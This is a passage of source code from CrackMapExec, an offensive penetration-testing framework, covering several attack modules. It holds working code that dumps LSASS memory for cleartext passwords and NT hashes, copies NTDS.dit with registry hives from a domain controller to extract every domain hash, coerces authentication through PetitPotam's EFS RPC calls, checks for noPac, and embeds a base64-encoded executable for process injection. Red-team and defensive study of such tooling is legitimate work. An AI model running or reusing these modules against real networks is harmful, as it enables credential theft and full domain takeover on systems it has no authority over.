fh.close()
with open(filename, "rb") as dump:
try:
bh_creds = []
try:
pypy_parse = pypykatz.parse_minidump_external(dump)
except Exception as e:
pypy_parse = None
self.context.log.fail(f"Error parsing minidump: {e}")
ssps = [
"msv_creds",
"wdigest_creds",
"ssp_creds",
"livessp_creds",
"kerberos_creds",
"credman_creds",
"tspkg_creds",
]
for luid in pypy_parse.logon_sessions:
for ssp in ssps:
for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
domain = getattr(cred, "domainname", None)
username = getattr(cred, "username", None)
password = getattr(cred, "password", None)
NThash = getattr(cred, "NThash", None)
if NThash is not None:
NThash = NThash.hex()
if username and (password or NThash) and "$" not in username:
if password:
credtype = "password"
credential = password
else:
credtype = "hash"
credential = NThash
self.context.log.highlight(f"{domain}\\{username}:{credential}")
host_id = self.context.db.get_hosts(self.connection.host)[0][0]
self.context.db.add_credential(
credtype,
connection.domain,
username,
credential,
pillaged_from=host_id,
)
if "." not in domain and domain.upper() in self.connection.domain.upper():
domain = self.connection.domain
bh_creds.append(
{
"username": username.upper(),
"domain": domain.upper(),
}
)
if len(bh_creds) > 0:
add_user_bh(bh_creds, None, self.context.log, self.connection.config)
except Exception as e:
self.context.log.fail(f"Error opening dump file: {e}")
def delete_nanodump_binary(self):
try:
self.connection.execute(f"del {self.tmp_dir + self.nano}")
self.context.log.success(f"Deleted nano file on the {self.share} dir")
except Exception as e:
self.context.log.fail(f"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}")
================================================
FILE: cme/modules/nopac.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
# @exploitph @Evi1cg
# module by @mpgn_x64
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT
from impacket.krb5 import constants
from impacket.krb5.types import Principal
class CMEModule:
name = "nopac"
description = "Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_login(self, context, connection):
user_name = Principal(connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
try:
tgt_with_pac, cipher, old_session_key, session_key = getKerberosTGT(
user_name,
connection.password,
connection.domain,
unhexlify(connection.lmhash),
unhexlify(connection.nthash),
connection.aesKey,
connection.host,
requestPAC=True,
)
context.log.highlight("TGT with PAC size " + str(len(tgt_with_pac)))
tgt_no_pac, cipher, old_session_key, session_key = getKerberosTGT(
user_name,
connection.password,
connection.domain,
unhexlify(connection.lmhash),
unhexlify(connection.nthash),
connection.aesKey,
connection.host,
requestPAC=False,
)
context.log.highlight("TGT without PAC size " + str(len(tgt_no_pac)))
if len(tgt_no_pac) < len(tgt_with_pac):
context.log.highlight("")
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/Ridter/noPac")
except OSError as e:
context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}")
================================================
FILE: cme/modules/ntdsutil.py
================================================
import os
import shutil
import tempfile
import time
from impacket.examples.secretsdump import LocalOperations, NTDSHashes
from cme.helpers.logger import highlight
from cme.helpers.misc import validate_ntlm
class CMEModule:
"""
Dump NTDS with ntdsutil
Module by @zblurx
"""
name = "ntdsutil"
description = "Dump NTDS with ntdsutil"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
"""
Dump NTDS with ntdsutil
Module by @zblurx
DIR_RESULT Local dir to write ntds dump. If specified, the local dump will not be deleted after parsing
"""
self.share = "ADMIN$"
self.tmp_dir = "C:\\Windows\\Temp\\"
self.tmp_share = self.tmp_dir.split("C:\\Windows\\")[1]
self.dump_location = str(time.time())[:9]
self.dir_result = self.dir_result = tempfile.mkdtemp()
self.no_delete = False
if "DIR_RESULT" in module_options:
self.dir_result = os.path.abspath(module_options["DIR_RESULT"])
self.no_delete = True
def on_admin_login(self, context, connection):
command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)
context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location))
context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
context.log.debug("Executing command {}".format(command))
p = connection.execute(command, True)
context.log.debug(p)
if "success" in p:
context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location))
else:
context.log.fail("Error while dumping NTDS")
return
os.makedirs(self.dir_result, exist_ok=True)
os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)
context.log.display("Copying NTDS dump to %s" % self.dir_result)
context.log.debug("Copy ntds.dit to host")
with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
try:
connection.conn.getFile(
self.share,
self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit",
dump_file.write,
)
context.log.debug("Copied ntds.dit file")
except Exception as e:
context.log.fail("Error while get ntds.dit file: {}".format(e))
context.log.debug("Copy SYSTEM to host")
with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
try:
connection.conn.getFile(
self.share,
self.tmp_share + self.dump_location + "\\" + "registry\\SYSTEM",
dump_file.write,
)
context.log.debug("Copied SYSTEM file")
except Exception as e:
context.log.fail("Error while get SYSTEM file: {}".format(e))
context.log.debug("Copy SECURITY to host")
with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
try:
connection.conn.getFile(
self.share,
self.tmp_share + self.dump_location + "\\" + "registry\\SECURITY",
dump_file.write,
)
context.log.debug("Copied SECURITY file")
except Exception as e:
context.log.fail("Error while get SECURITY file: {}".format(e))
context.log.display("NTDS dump copied to %s" % self.dir_result)
try:
command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location)
p = connection.execute(command, True)
context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location))
except Exception as e:
context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e))
localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result)
bootKey = localOperations.getBootKey()
noLMHash = localOperations.checkNoLMHashPolicy()
host_id = context.db.get_hosts(filter_term=connection.host)[0][0]
def add_ntds_hash(ntds_hash, host_id):
add_ntds_hash.ntds_hashes += 1
if context.enabled:
if "Enabled" in ntds_hash:
ntds_hash = ntds_hash.split(" ")[0]
context.log.highlight(ntds_hash)
else:
ntds_hash = ntds_hash.split(" ")[0]
context.log.highlight(ntds_hash)
if ntds_hash.find("$") == -1:
if ntds_hash.find("\\") != -1:
domain, hash = ntds_hash.split("\\")
else:
domain = connection.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(":")
parsed_hash = ":".join((lmhash, nthash))
if validate_ntlm(parsed_hash):
context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
add_ntds_hash.added_to_db += 1
return
raise
except:
context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")
else:
context.log.debug("Dumped hash is a computer account, not adding to db")
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.added_to_db = 0
NTDS = NTDSHashes(
"%s/Active Directory/ntds.dit" % self.dir_result,
bootKey,
isRemote=False,
history=False,
noLMHash=noLMHash,
remoteOps=None,
useVSSMethod=True,
justNTLM=True,
pwdLastSet=False,
resumeSession=None,
outputFileName=connection.output_filename,
justUser=None,
printUserStatus=True,
perSecretCallback=lambda secretType, secret: add_ntds_hash(secret, host_id),
)
try:
context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")
NTDS.dump()
context.log.success(
"Dumped {} NTDS hashes to {} of which {} were added to the database".format(
highlight(add_ntds_hash.ntds_hashes),
connection.output_filename + ".ntds",
highlight(add_ntds_hash.added_to_db),
)
)
context.log.display("To extract only enabled accounts from the output file, run the following command: ")
context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds"))
except Exception as e:
context.log.fail(e)
NTDS.finish()
if self.no_delete:
context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result)
context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))
else:
shutil.rmtree(self.dir_result)
================================================
FILE: cme/modules/ntlmv1.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.rrp import DCERPCSessionError
class CMEModule:
"""
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
Module by @Tw1sm
"""
name = "ntlmv1"
description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
self.output = "NTLMv1 allowed on: {} - LmCompatibilityLevel = {}"
def on_admin_login(self, context, connection):
try:
remote_ops = RemoteOperations(connection.conn, False)
remote_ops.enableRegistry()
if remote_ops._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
reg_handle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remote_ops._RemoteOperations__rrp,
reg_handle,
"SYSTEM\\CurrentControlSet\\Control\\Lsa",
)
key_handle = ans["phkResult"]
rtype = None
data = None
try:
rtype, data = rrp.hBaseRegQueryValue(
remote_ops._RemoteOperations__rrp,
key_handle,
"lmcompatibilitylevel\x00",
)
except rrp.DCERPCSessionError as e:
context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
if rtype and data and int(data) in [0, 1, 2]:
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
except DCERPCSessionError as e:
context.log.debug(f"Error connecting to RemoteRegistry: {e}")
finally:
remote_ops.finish()
================================================
FILE: cme/modules/petitpotam.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# From https://github.com/topotam/PetitPotam
# All credit to @topotam
# Module by @mpgn_x64
import sys
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import (
DCERPCException,
RPC_C_AUTHN_WINNT,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_GSS_NEGOTIATE,
)
from impacket.uuid import uuidtup_to_bin
class CMEModule:
name = "petitpotam"
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
LISTENER IP of your listener
PIPE Default PIPE (default: lsarpc)
"""
self.listener = "127.0.0.1"
if "LISTENER" in module_options:
self.listener = module_options["LISTENER"]
self.pipe = "lsarpc"
if "PIPE" in module_options:
self.pipe = module_options["PIPE"]
def on_login(self, context, connection):
dce = coerce(
connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
aesKey=connection.aesKey,
target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
pipe=self.pipe,
do_kerberos=connection.kerberos,
dc_host=connection.kdcHost,
target_ip=connection.host,
context=context,
)
if efs_rpc_open_file_raw(dce, self.listener, context):
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
try:
host = context.db.get_hosts(connection.host)[0]
context.db.add_host(
host.ip,
host.hostname,
host.domain,
host.os,
host.smbv1,
host.signing,
petitpotam=True,
)
except Exception as e:
context.log.debug(f"Error updating petitpotam status in database")
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__(self):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return "EFSR SessionError: code: 0x%x - %s - %s" % (
self.error_code,
error_msg_short,
error_msg_verbose,
)
else:
return "EFSR SessionError: unknown error code: 0x%x" % self.error_code
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (("Data", "20s"),)
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
structure = (("Data", ":"),)
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
("Data", DWORD),
("cbData", PCHAR),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
("Data", DWORD),
("cbData", PCHAR),
)
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
("Type", DWORD),
("Data", DWORD),
("cbData", PCHAR),
)
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
("Lenght", DWORD),
("SID", RPC_SID),
("Hash", EFS_HASH_BLOB),
("Display", LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
("Lenght", DWORD),
("SID", RPC_SID),
("Hash", EFS_CERTIFICATE_BLOB),
)
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
("Cert", DWORD),
("Users", ENCRYPTION_CERTIFICATE_HASH),
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
structure = (
("Type", DWORD),
("HASH", ENCRYPTION_CERTIFICATE_HASH_LIST),
("Certif", ENCRYPTION_CERTIFICATE),
("Blob", EFS_RPC_BLOB),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (("Data", ":"),)
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
("fileName", WSTR),
("Flag", ULONG),
)
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
("hContext", EXIMPORT_CONTEXT_HANDLE),
("ErrorCode", ULONG),
)
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
structure = (("FileName", WSTR),)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
structure = (("ErrorCode", ULONG),)
def coerce(
username,
password,
domain,
lmhash,
nthash,
aesKey,
target,
pipe,
do_kerberos,
dc_host,
target_ip=None,
context=None,
):
binding_params = {
"lsarpc": {
"stringBinding": r"ncacn_np:%s[\PIPE\lsarpc]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
"efsr": {
"stringBinding": r"ncacn_np:%s[\PIPE\efsrpc]" % target,
"MSRPC_UUID_EFSR": ("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0"),
},
"samr": {
"stringBinding": r"ncacn_np:%s[\PIPE\samr]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
"lsass": {
"stringBinding": r"ncacn_np:%s[\PIPE\lsass]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
"netlogon": {
"stringBinding": r"ncacn_np:%s[\PIPE\netlogon]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
}
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"])
if hasattr(rpc_transport, "set_credentials"):
rpc_transport.set_credentials(
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
aesKey=aesKey,
)
if target_ip:
rpc_transport.setRemoteHost(target_ip)
dce = rpc_transport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if do_kerberos:
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
context.log.info("[-] Connecting to %s" % binding_params[pipe]["stringBinding"])
try:
dce.connect()
except Exception as e:
context.log.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
context.log.info("[+] Connected!")
context.log.info("[+] Binding to %s" % binding_params[pipe]["MSRPC_UUID_EFSR"][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
except Exception as e:
context.log.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
context.log.info("[+] Successfully bound!")
return dce
def efs_rpc_open_file_raw(dce, listener, context=None):
try:
request = EfsRpcOpenFileRaw()
request["fileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
request["Flag"] = 0
resp = dce.request(request)
except Exception as e:
if str(e).find("ERROR_BAD_NETPATH") >= 0:
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
context.log.info("[+] Attack worked!")
return True
if str(e).find("rpc_s_access_denied") >= 0:
context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!")
context.log.info("[+] OK! Using unpatched function!")
context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request["FileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
resp = dce.request(request)
except Exception as e:
if str(e).find("ERROR_BAD_NETPATH") >= 0:
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
context.log.info("[+] Attack worked!")
return True
else:
context.log.debug("Something went wrong, check error status => %s" % str(e))
else:
context.log.debug("Something went wrong, check error status => %s" % str(e))
================================================
FILE: cme/modules/pi.py
================================================
from base64 import b64decode
from sys import exit
from os import path
class CMEModule:
name = "pi"
description = "Run command as logged on users via Process Injection"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
PID // Process ID for Target User, PID=pid
EXEC // Command to exec, EXEC='command' Single quote is better to use
This module reads the executed command output under the name C:\windows\temp\output.txt and deletes it. In case of a possible error, it may need to be deleted manually.
'''
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.pi = "pi.exe"
self.useembeded = True
self.pid = self.cmd = ""
self.pi_embedded = b64decode('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